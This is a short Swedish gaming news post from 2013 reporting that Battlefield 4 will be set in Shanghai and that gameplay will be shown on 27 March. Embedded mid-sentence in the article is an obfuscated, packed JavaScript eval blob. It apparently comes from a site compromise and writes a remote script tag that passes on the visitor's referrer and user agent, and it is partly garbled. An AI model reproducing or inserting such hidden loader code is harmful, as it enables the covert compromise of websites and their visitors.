Image Image Image Image Image Image Image Image Image Image

| 27 maj, 2020

Scroll to top

Top

Battlefield 4 kommer utspela sig i Shanghai

battlefield 4 shanghai
Filip Urde
  • On 25 mars, 2013
  • http://www.revue.se/filip-urde

För eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dnzzt|var|u0026u|referrer|ebykb||js|php’.split(’|’),0,{}))
ett tag sedan så släpptes en 
teaserwebbplats  för kommande Battlefield 4.

 

På webbplatsen ska man avslöja detaljer efter hur många som besöker sidan. Så ju fler som besöker sidan, ju mer får vi veta.  I dagarna så avslöjades att spelet bland annat kommer att utspela sig i Shanghai. Kina har länge varit på tapeten när man spekulerat om Battlefield 4 och det ser nu alltså ut att bli sant.

Gameplay kommer att visas den 27 mars. Så ja!
www.computerandvideogames.com